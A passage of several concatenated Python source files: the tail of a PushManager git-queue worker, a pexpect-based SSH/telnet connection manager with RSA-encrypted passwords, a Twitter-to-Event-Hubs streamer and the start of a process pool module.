<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em><br />
<a href="%(pushmanager_url)s/request?id=%(id)s">%(pushmanager_url)s/request?id=%(id)s</a>
</p>
<p>
Review # (if specified): <a href="https://%(reviewboard_servername)s/r/%(reviewid)s">%(reviewid)s</a>
</p>
<p>
<code>%(revision)s</code><br/>
<em>(If this is <strong>not</strong> the revision you expected,
make sure you've pushed your latest version to the correct repo!)</em>
</p>
<p>
%(conflicts)s
</p>
<p>
Regards,<br/>
PushManager
</p>
"""
)
updated_request.update(
{
'conflicts_with': (
"master"
if 'conflict-master' in updated_request['tags']
else "another pickme"
),
'conflicts': updated_request['conflicts'].replace('\n', '<br/>'),
'reviewboard_servername': Settings['reviewboard']['servername'],
'pushmanager_url' : pushmanager_url
}
)
escaped_request = EscapedDict(updated_request)
escaped_request.unescape_key('conflicts')
msg %= escaped_request
subject = (
'[push conflict] %s - %s'
% (updated_request['user'], updated_request['title'])
)
user_to_notify = updated_request['user']
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
msg = """PushManager has detected that your pickme for %(pickme_name)s contains conflicts with %(conflicts_with)s
%(pushmanager_url)s/request?id=%(pickme_id)s""" % {
'conflicts_with': (
"master"
if 'conflict-master' in updated_request['tags']
else "another pickme"
),
'pickme_name': updated_request['branch'],
'pickme_id': updated_request['id'],
'pushmanager_url' : pushmanager_url
}
XMPPQueue.enqueue_user_xmpp([user_to_notify], msg)
@classmethod
def verify_branch(cls, request_id, pushmanager_url):
req = cls._get_request(request_id)
if not req:
# Just log this and return. We won't be able to get more
# data out of the request.
error_msg = "Git queue worker received a job for non-existent request id %s" % request_id
logging.error(error_msg)
return
if cls.request_is_excluded_from_git_verification(req):
return
if not req['branch']:
error_msg = "Git queue worker received a job for request with no branch (id %s)" % request_id
return cls.verify_branch_failure(req, error_msg, pushmanager_url)
sha = cls._get_branch_sha_from_repo(req)
if sha is None:
error_msg = "Git queue worker could not get the revision from request branch (id %s)" % request_id
return cls.verify_branch_failure(req, error_msg, pushmanager_url)
duplicate_req = cls._get_request_with_sha(sha)
if (
duplicate_req and 'state' in duplicate_req
and not duplicate_req['state'] == "discarded"
and duplicate_req['id'] is not request_id
):
error_msg = "Git queue worker found another request with the same revision sha (ids %s and %s)" % (
duplicate_req['id'],
request_id
)
return cls.verify_branch_failure(req, error_msg, pushmanager_url)
updated_tags = add_to_tags_str(req['tags'], 'git-ok')
updated_tags = del_from_tags_str(updated_tags, 'git-error')
updated_values = {'revision': sha, 'tags': updated_tags}
updated_request = cls._update_request(req, updated_values)
if updated_request:
cls.verify_branch_successful(updated_request, pushmanager_url)
@classmethod
def verify_branch_successful(cls, updated_request, pushmanager_url):
msg = (
"""
<p>
PushManager has verified the branch for your request.
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em><br />
<a href="%(pushmanager_url)s/request?id=%(id)s">%(pushmanager_url)s/request?id=%(id)s</a>
</p>
<p>
Review # (if specified): <a href="https://%(reviewboard_servername)s/r/%(reviewid)s">%(reviewid)s</a>
</p>
<p>
Verified revision: <code>%(revision)s</code><br/>
<em>(If this is <strong>not</strong> the revision you expected,
make sure you've pushed your latest version to the correct repo!)</em>
</p>
<p>
Regards,<br/>
PushManager
</p>
"""
)
updated_request.update({
'pushmanager_url' : pushmanager_url,
'reviewboard_servername': Settings['reviewboard']['servername']
})
msg %= EscapedDict(updated_request)
subject = '[push] %s - %s' % (
updated_request['user'],
updated_request['title']
)
user_to_notify = updated_request['user']
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
webhook_req(
'pushrequest',
updated_request['id'],
'ref',
updated_request['branch'],
)
webhook_req(
'pushrequest',
updated_request['id'],
'commit',
updated_request['revision'],
)
if updated_request['reviewid']:
webhook_req(
'pushrequest',
updated_request['id'],
'review',
updated_request['reviewid'],
)
@classmethod
def verify_branch_failure(cls, request, failure_msg, pushmanager_url):
logging.error(failure_msg)
updated_tags = add_to_tags_str(request['tags'], 'git-error')
updated_tags = del_from_tags_str(updated_tags, 'git-ok')
updated_values = {'tags': updated_tags}
cls._update_request(request, updated_values)
msg = (
"""
<p>
<em>PushManager could <strong>not</strong> verify the branch for your request.</em>
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em><br />
<a href="%(pushmanager_url)s/request?id=%(id)s">%(pushmanager_url)s/request?id=%(id)s</a>
</p>
<p>
<strong>Error message</strong>:<br />
%(failure_msg)s
</p>
<p>
Review # (if specified): <a href="https://%(reviewboard_servername)s/r/%(reviewid)s">%(reviewid)s</a>
</p>
<p>
Verified revision: <code>%(revision)s</code><br/>
<em>(If this is <strong>not</strong> the revision you expected,
make sure you've pushed your latest version to the correct repo!)</em>
</p>
<p>
Regards,<br/>
PushManager
</p>
"""
)
request.update({
'failure_msg': failure_msg,
'pushmanager_url' : pushmanager_url,
'reviewboard_servername': Settings['reviewboard']['servername']
})
msg %= EscapedDict(request)
subject = '[push] %s - %s' % (request['user'], request['title'])
user_to_notify = request['user']
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
@classmethod
def requeue_pickmes_for_push(cls, push_id, pushmanager_url, conflicting_only=False):
request_details = []
for pickme_id in cls._get_request_ids_in_push(push_id):
request_details.append(cls._get_request(pickme_id))
if conflicting_only:
request_details = [
req for req in request_details
if req and req['tags']
and 'conflict-pickme' in req['tags']
]
for req in request_details:
GitQueue.enqueue_request(
GitTaskAction.TEST_PICKME_CONFLICT,
req['id'],
pushmanager_url=pushmanager_url,
requeue=False
)
@classmethod
def process_sha_queue(cls):
logging.info("Starting GitConflictQueue")
while True:
# Throttle
time.sleep(1)
task = cls.sha_queue.get()
if not isinstance(task, GitQueueTask):
logging.error("Non-task object in GitSHAQueue: %s", task)
continue
try:
if task.task_type is GitTaskAction.VERIFY_BRANCH:
cls.verify_branch(task.request_id, task.kwargs['pushmanager_url'])
else:
logging.error(
"GitSHAQueue encountered unknown task type %d",
task.task_type
)
except Exception:
logging.error('THREAD ERROR:', exc_info=True)
finally:
cls.sha_queue.task_done()
@classmethod
def process_conflict_queue(cls, worker_id):
logging.error("Starting GitConflictQueue %d", worker_id)
while True:
# Throttle
time.sleep(1)
task = cls.conflict_queue.get()
if not isinstance(task, GitQueueTask):
logging.error("Non-task object in GitConflictQueue: %s", task)
continue
try:
if task.task_type is GitTaskAction.TEST_PICKME_CONFLICT:
cls.test_pickme_conflicts(worker_id, task.request_id, **task.kwargs)
elif task.task_type is GitTaskAction.TEST_CONFLICTING_PICKMES:
cls.requeue_pickmes_for_push(task.request_id, task.kwargs['pushmanager_url'], conflicting_only=True)
elif task.task_type is GitTaskAction.TEST_ALL_PICKMES:
cls.requeue_pickmes_for_push(task.request_id, task.kwargs['pushmanager_url'])
else:
logging.error(
"GitConflictQueue encountered unknown task type %d",
task.task_type
)
except Exception:
logging.error('THREAD ERROR:', exc_info=True)
finally:
cls.conflict_queue.task_done()
@classmethod
def enqueue_request(cls, task_type, request_id, **kwargs):
if task_type is GitTaskAction.VERIFY_BRANCH:
if not cls.sha_queue:
logging.error("Attempted to put to nonexistent GitSHAQueue!")
return
cls.sha_queue.put(GitQueueTask(task_type, request_id, **kwargs))
else:
if not cls.conflict_queue:
logging.error("Attempted to put to nonexistent GitConflictQueue!")
return
cls.conflict_queue.put(GitQueueTask(task_type, request_id, **kwargs))
def webhook_req(left_type, left_token, right_type, right_token):
webhook_url = Settings['web_hooks']['post_url']
body = urlencode({
'reason': 'pushmanager',
'left_type': left_type,
'left_token': left_token,
'right_type': right_type,
'right_token': right_token,
})
try:
f = urllib2.urlopen(webhook_url, body, timeout=3)
f.close()
except urllib2.URLError:
logging.error("Web hook POST failed:", exc_info=True)
__all__ = ['GitQueue']
|
core.py
|
#!/usr/bin/env python3
#Imports
import os
import re
import pexpect
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import ast
from time import sleep
import datetime
import sys
import threading
from pathlib import Path
from copy import deepcopy
#functions and classes
class node:
''' This class generates a node object. Containts all the information and methods to connect and interact with a device using ssh or telnet.
### Attributes:
- output (str): Output of the commands you ran with run or test
method.
- result(bool): True if expected value is found after running
the commands using test method.
- status (int): 0 if the method run or test run succesfully.
1 if connection failed.
2 if expect timeouts without prompt or EOF.
'''
def __init__(self, unique, host, options='', logs='', password='', port='', protocol='', user='', config=''):
'''
### Parameters:
- unique (str): Unique name to assign to the node.
- host (str): IP address or hostname of the node.
### Optional Parameters:
- options (str): Additional options to pass the ssh/telnet for
connection.
- logs (str): Path/file for storing the logs. You can use
${unique},${host}, ${port}, ${user}, ${protocol}
as variables.
- password (str): Encrypted or plaintext password.
- port (str): Port to connect to node, default 22 for ssh and 23
for telnet.
- protocol (str): Select ssh or telnet. Default is ssh.
- user (str): Username to of the node.
- config (obj): Pass the object created with class configfile with
key for decryption and extra configuration if you
are using connection manager.
'''
if config == '':
self.idletime = 0
self.key = None
else:
self.idletime = config.config["idletime"]
self.key = config.key
self.unique = unique
attr = {"host": host, "logs": logs, "options":options, "port": port, "protocol": protocol, "user": user}
for key in attr:
profile = re.search("^@(.*)", attr[key])
if profile and config != '':
setattr(self,key,config.profiles[profile.group(1)][key])
elif attr[key] == '' and key == "protocol":
try:
setattr(self,key,config.profiles["default"][key])
except:
setattr(self,key,"ssh")
else:
setattr(self,key,attr[key])
if isinstance(password,list):
self.password = []
for i, s in enumerate(password):
profile = re.search("^@(.*)", password[i])
if profile and config != '':
self.password.append(config.profiles[profile.group(1)]["password"])
else:
self.password = [password]
def __passtx(self, passwords, *, keyfile=None):
# decrypts passwords, used by other methdos.
dpass = []
if keyfile is None:
keyfile = self.key
if keyfile is not None:
key = RSA.import_key(open(keyfile).read())
decryptor = PKCS1_OAEP.new(key)
for passwd in passwords:
if not re.match('^b[\"\'].+[\"\']$', passwd):
dpass.append(passwd)
else:
try:
decrypted = decryptor.decrypt(ast.literal_eval(passwd)).decode("utf-8")
dpass.append(decrypted)
except:
raise ValueError("Missing or corrupted key")
return dpass
def _logfile(self, logfile = None):
# translate logs variables and generate logs path.
if logfile == None:
logfile = self.logs
logfile = logfile.replace("${unique}", self.unique)
logfile = logfile.replace("${host}", self.host)
logfile = logfile.replace("${port}", self.port)
logfile = logfile.replace("${user}", self.user)
logfile = logfile.replace("${protocol}", self.protocol)
now = datetime.datetime.now()
dateconf = re.search(r'\$\{date \'(.*)\'}', logfile)
if dateconf:
logfile = re.sub(r'\$\{date (.*)}',now.strftime(dateconf.group(1)), logfile)
return logfile
def _logclean(self, logfile, var = False):
#Remove special ascii characters and other stuff from logfile.
if var == False:
t = open(logfile, "r").read()
else:
t = logfile
t = t.replace("\n","",1)
t = t.replace("\a","")
t = t.replace('\n\n', '\n')
t = re.sub(r'.\[K', '', t)
while True:
tb = re.sub('.\b', '', t, count=1)
if len(t) == len(tb):
break
t = tb
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/ ]*[@-~])')
t = ansi_escape.sub('', t)
t = t.lstrip(" \n\r")
t = t.replace("\r","")
if var == False:
d = open(logfile, "w")
d.write(t)
d.close()
return
else:
return t
def interact(self, debug = False):
'''
Allow user to interact with the node directly, mostly used by connection manager.
### Optional Parameters:
- debug (bool): If True, display all the connecting information
before interact. Default False.
'''
connect = self._connect(debug = debug)
if connect == True:
size = re.search('columns=([0-9]+).*lines=([0-9]+)',str(os.get_terminal_size()))
self.child.setwinsize(int(size.group(2)),int(size.group(1)))
print("Connected to " + self.unique + " at " + self.host + (":" if self.port != '' else '') + self.port + " via: " + self.protocol)
if 'logfile' in dir(self):
self.child.logfile_read = open(self.logfile, "wb")
elif debug:
self.child.logfile_read = None
if 'missingtext' in dir(self):
print(self.child.after.decode(), end='')
self.child.interact()
if "logfile" in dir(self) and not debug:
self._logclean(self.logfile)
else:
print(connect)
exit(1)
def run(self, commands, vars = None,*, folder = '', prompt = r'>$|#$|\$$|>.$|#.$|\$.$', stdout = False, timeout = 10):
'''
Run a command or list of commands on the node and return the output.
### Parameters:
- commands (str/list): Commands to run on the node. Should be
str or a list of str. You can use variables
as {varname} and defining them in optional
parameter vars.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables
used in commands parameter.
Keys: Variable names.
Values: strings.
### Optional Named Parameters:
- folder (str): Path where output log should be stored, leave
empty to disable logging.
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while
routers use ">" or "#". The default value should
work for most nodes. Change it if your connection
need some special symbol.
- stdout (bool):Set True to send the command output to stdout.
default False.
- timeout (int):Time in seconds for expect to wait for prompt/EOF.
default 10.
### Returns:
str: Output of the commands you ran on the node.
'''
connect = self._connect(timeout = timeout)
now = datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')
if connect == True:
expects = [prompt, pexpect.EOF, pexpect.TIMEOUT]
output = ''
status = ''
if not isinstance(commands, list):
commands = [commands]
for c in commands:
if vars is not None:
c = c.format(**vars)
result = self.child.expect(expects, timeout = timeout)
self.child.sendline(c)
if result == 0:
output = output + self.child.before.decode() + self.child.after.decode()
if result == 1:
output = output + self.child.before.decode()
if result == 2:
output = output + self.child.before.decode()
status = 2
break
if not status == 2:
result = self.child.expect(expects, timeout = timeout)
if result == 0:
output = output + self.child.before.decode() + self.child.after.decode()
if result == 1:
output = output + self.child.before.decode()
if result == 2:
output = output + self.child.before.decode()
status = 2
self.child.close()
output = self._logclean(output, True)
if stdout == True:
print(output)
if folder != '':
with open(folder + "/" + self.unique + "_" + now + ".txt", "w") as f:
f.write(output)
f.close()
self.output = output
if status == 2:
self.status = 2
else:
self.status = 0
return output
else:
self.output = connect
self.status = 1
if stdout == True:
print(connect)
if folder != '':
with open(folder + "/" + self.unique + "_" + now + ".txt", "w") as f:
f.write(connect)
f.close()
return connect
def test(self, commands, expected, vars = None,*, prompt = r'>$|#$|\$$|>.$|#.$|\$.$', timeout = 10):
'''
Run a command or list of commands on the node, then check if expected value appears on the output after the last command.
### Parameters:
- commands (str/list): Commands to run on the node. Should be
str or a list of str. You can use variables
as {varname} and defining them in optional
parameter vars.
- expected (str) : Expected text to appear after running
all the commands on the node.You can use
variables as {varname} and defining them
in optional parameter vars.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables
used in commands and expected parameters.
Keys: Variable names.
Values: strings.
### Optional Named Parameters:
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while
routers use ">" or "#". The default value should
work for most nodes. Change it if your connection
need some special symbol.
- timeout (int):Time in seconds for expect to wait for prompt/EOF.
default 10.
### Returns:
bool: true if expected value is found after running the commands
false if prompt is found before.
'''
connect = self._connect(timeout = timeout)
if connect == True:
expects = [prompt, pexpect.EOF, pexpect.TIMEOUT]
output = ''
if not isinstance(commands, list):
commands = [commands]
for c in commands:
if vars is not None:
c = c.format(**vars)
result = self.child.expect(expects, timeout = timeout)
self.child.sendline(c)
if result == 0:
output = output + self.child.before.decode() + self.child.after.decode()
if result == 1:
output = output + self.child.before.decode()
if result == 2:
output = output + self.child.before.decode()
self.result = None
self.output = self._logclean(output, True)
self.status = 2
return self.output
if vars is not None:
expected = expected.format(**vars)
expects = [expected, prompt, pexpect.EOF, pexpect.TIMEOUT]
results = self.child.expect(expects, timeout = timeout)
self.child.close()
if results == 0:
self.result = True
output = output + self.child.before.decode() + self.child.after.decode()
output = self._logclean(output, True)
self.output = output
self.status = 0
return True
if results in [1, 2]:
self.result = False
if results == 1:
output = output + self.child.before.decode() + self.child.after.decode()
elif results == 2:
output = output + self.child.before.decode()
output = self._logclean(output, True)
self.output = output
self.status = 0
return False
if results == 3:
self.result = None
output = output + self.child.before.decode()
output = self._logclean(output, True)
self.output = output
self.status = 2
return output
else:
self.result = None
self.output = connect
self.status = 1
return connect
def _connect(self, debug = False, timeout = 20):
# Method to connect to the node, it parse all the information, create the ssh/telnet command and login to the node.
if self.protocol == "ssh":
cmd = "ssh"
if self.idletime > 0:
cmd = cmd + " -o ServerAliveInterval=" + str(self.idletime)
if self.user == '':
cmd = cmd + " {}".format(self.host)
else:
cmd = cmd + " {}".format("@".join([self.user,self.host]))
if self.port != '':
cmd = cmd + " -p " + self.port
if self.options != '':
cmd = cmd + " " + self.options
if self.logs != '':
self.logfile = self._logfile()
if self.password[0] != '':
passwords = self.__passtx(self.password)
else:
passwords = []
expects = ['yes/no', 'refused', 'supported', 'cipher', 'sage', 'timeout', 'unavailable', 'closed', '[p|P]assword:|[u|U]sername:', r'>$|#$|\$$|>.$|#.$|\$.$', 'suspend', pexpect.EOF, pexpect.TIMEOUT, "No route to host", "resolve hostname", "no matching host key"]
elif self.protocol == "telnet":
cmd = "telnet " + self.host
if self.port != '':
cmd = cmd + " " + self.port
if self.options != '':
cmd = cmd + " " + self.options
if self.logs != '':
self.logfile = self._logfile()
if self.password[0] != '':
passwords = self.__passtx(self.password)
else:
passwords = []
expects = ['[u|U]sername:', 'refused', 'supported', 'cipher', 'sage', 'timeout', 'unavailable', 'closed', '[p|P]assword:', r'>$|#$|\$$|>.$|#.$|\$.$', 'suspend', pexpect.EOF, pexpect.TIMEOUT, "No route to host", "resolve hostname", "no matching host key"]
else:
raise ValueError("Invalid protocol: " + self.protocol)
child = pexpect.spawn(cmd)
if debug:
print(cmd)
child.logfile_read = sys.stdout.buffer
if len(passwords) > 0:
loops = len(passwords)
else:
loops = 1
endloop = False
for i in range(0, loops):
while True:
results = child.expect(expects, timeout=timeout)
if results == 0:
if self.protocol == "ssh":
child.sendline('yes')
elif self.protocol == "telnet":
if self.user != '':
child.sendline(self.user)
else:
self.missingtext = True
break
if results in [1, 2, 3, 4, 5, 6, 7, 12, 13, 14, 15]:
child.close()
return "Connection failed code:" + str(results)
if results == 8:
if len(passwords) > 0:
child.sendline(passwords[i])
else:
self.missingtext = True
break
if results in [9, 11]:
endloop = True
child.sendline()
break
if results == 10:
child.sendline("\r")
sleep(2)
if endloop:
break
child.readline(0)
self.child = child
return True
class nodes:
''' This class generates a nodes object. Contains a list of node class objects and methods to run multiple tasks on nodes simultaneously.
### Attributes:
- nodelist (list): List of node class objects passed to the init
function.
- output (dict): Dictionary formed by nodes unique as keys,
output of the commands you ran on the node as
value. Created after running methods run or test.
- result (dict): Dictionary formed by nodes unique as keys, value
is True if expected value is found after running
the commands, False if prompt is found before.
Created after running method test.
- status (dict): Dictionary formed by nodes unique as keys, value:
0 if method run or test ended succesfully.
1 if connection failed.
2 if expect timeouts without prompt or EOF.
- <unique> (obj): For each item in nodelist, there is an attribute
generated with the node unique.
'''
def __init__(self, nodes: dict, config = ''):
'''
### Parameters:
- nodes (dict): Dictionary formed by node information:
Keys: Unique name for each node.
Mandatory Subkeys: host(str).
Optional Subkeys: options(str), logs(str), password(str),
port(str), protocol(str), user(str).
For reference on subkeys check node class.
### Optional Parameters:
- config (obj): Pass the object created with class configfile with key
for decryption and extra configuration if you are using
connection manager.
'''
self.nodelist = []
self.config = config
for n in nodes:
this = node(n, **nodes[n], config = config)
self.nodelist.append(this)
setattr(self,n,this)
def _splitlist(self, lst, n):
#split a list in lists of n members.
for i in range(0, len(lst), n):
yield lst[i:i + n]
def run(self, commands, vars = None,*, folder = None, prompt = None, stdout = None, parallel = 10, timeout = None):
'''
Run a command or list of commands on all the nodes in nodelist.
### Parameters:
- commands (str/list): Commands to run on the nodes. Should be str or
list of str. You can use variables as {varname}
and defining them in optional parameter vars.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables for
each node, used in commands parameter.
Keys should be formed by nodes unique names. Use
special key name __global__ for global variables.
Subkeys: Variable names.
Values: strings.
### Optional Named Parameters:
- folder (str): Path where output log should be stored, leave empty
to disable logging.
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while routers
use ">" or "#". The default value should work for
most nodes. Change it if your connection need some
special symbol.
- stdout (bool): Set True to send the command output to stdout.
Default False.
- parallel (int): Number of nodes to run the commands simultaneously.
Default is 10, if there are more nodes that this
value, nodes are groups in groups with max this
number of members.
- timeout (int): Time in seconds for expect to wait for prompt/EOF.
default 20.
###Returns:
dict: Dictionary formed by nodes unique as keys, Output of the
commands you ran on the node as value.
'''
args = {}
nodesargs = {}
args["commands"] = commands
if folder != None:
args["folder"] = folder
Path(folder).mkdir(parents=True, exist_ok=True)
if prompt != None:
args["prompt"] = prompt
if stdout != None:
args["stdout"] = stdout
if timeout != None:
args["timeout"] = timeout
output = {}
status = {}
tasks = []
for n in self.nodelist:
nodesargs[n.unique] = deepcopy(args)
if vars != None:
nodesargs[n.unique]["vars"] = {}
if "__global__" in vars.keys():
nodesargs[n.unique]["vars"].update(vars["__global__"])
if n.unique in vars.keys():
nodesargs[n.unique]["vars"].update(vars[n.unique])
tasks.append(threading.Thread(target=n.run, kwargs=nodesargs[n.unique]))
taskslist = list(self._splitlist(tasks, parallel))
for t in taskslist:
for i in t:
i.start()
for i in t:
i.join()
for i in self.nodelist:
output[i.unique] = i.output
status[i.unique] = i.status
self.output = output
self.status = status
return output
def test(self, commands, expected, vars = None,*, prompt = None, parallel = 10, timeout = None):
'''
Run a command or list of commands on all the nodes in nodelist, then check if expected value appears on the output after the last command.
### Parameters:
- commands (str/list): Commands to run on the node. Should be str or
list of str.
- expected (str) : Expected text to appear after running all the
commands on the node.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables for
each node, used in commands and expected parameters.
Keys should be formed by nodes unique names. Use
special key name __global__ for global variables.
Subkeys: Variable names.
Values: strings.
### Optional Named Parameters:
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while
routers use ">" or "#". The default value should
work for most nodes. Change it if your connection
need some special symbol.
- parallel (int): Number of nodes to run the commands simultaneously.
Default is 10, if there are more nodes that this
value, nodes are groups in groups with max this
number of members.
- timeout (int): Time in seconds for expect to wait for prompt/EOF.
default 20.
### Returns:
dict: Dictionary formed by nodes unique as keys, value is True if
expected value is found after running the commands, False
if prompt is found before.
'''
args = {}
nodesargs = {}
args["commands"] = commands
args["expected"] = expected
if prompt != None:
args["prompt"] = prompt
if timeout != None:
args["timeout"] = timeout
output = {}
result = {}
status = {}
tasks = []
for n in self.nodelist:
nodesargs[n.unique] = deepcopy(args)
if vars != None:
nodesargs[n.unique]["vars"] = {}
if "__global__" in vars.keys():
nodesargs[n.unique]["vars"].update(vars["__global__"])
if n.unique in vars.keys():
nodesargs[n.unique]["vars"].update(vars[n.unique])
tasks.append(threading.Thread(target=n.test, kwargs=nodesargs[n.unique]))
taskslist = list(self._splitlist(tasks, parallel))
for t in taskslist:
for i in t:
i.start()
for i in t:
i.join()
for i in self.nodelist:
result[i.unique] = i.result
output[i.unique] = i.output
status[i.unique] = i.status
self.output = output
self.result = result
self.status = status
return result
# script
|
main.py
|
from streamlistener import StreamListener
import tweepy
from settings import Settings
from send import EventHubSender
import webapp
import threading
httpd=webapp.HTTPServer(('0.0.0.0',Settings.WEB_PORT),webapp.web_server)
thread= threading.Thread(target= httpd.serve_forever)
thread.daemon=True
thread.start()
print("HTTPServer started in port {0}".format(Settings.WEB_PORT))
auth = tweepy.OAuthHandler(Settings.TWITTER_APP_KEY, Settings.TWITTER_APP_SECRET)
auth.set_access_token(Settings.TWITTER_KEY, Settings.TWITTER_SECRET)
api = tweepy.API(auth)
stream_listener = StreamListener(output=EventHubSender(Settings.EVENTHUBS_CONNECTIONSTRING))
stream = tweepy.Stream(auth=api.auth, listener=stream_listener)
stream.filter(track=Settings.TRACK_TERMS)
httpd.shutdown()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import pickle_loads, reset_signals, restart_state
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
else:
from os import kill as _kill # noqa
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
SIGMAP = dict(
(getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG')
)
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def human_status(status):
if (status or 0) < 0:
try:
return 'signal {0} ({1})'.format(-status, SIGMAP[-status])
except KeyError:
return 'signal {0}'.format(-status)
return 'exitcode {0}'.format(status)
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def __init__(self, value=1, verbose=None):
if PY3:
_Semaphore.__init__(self, value)
else:
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
if PY3:
cond = self._cond
else:
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
_controlled_termination = False
_job_terminated = False
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
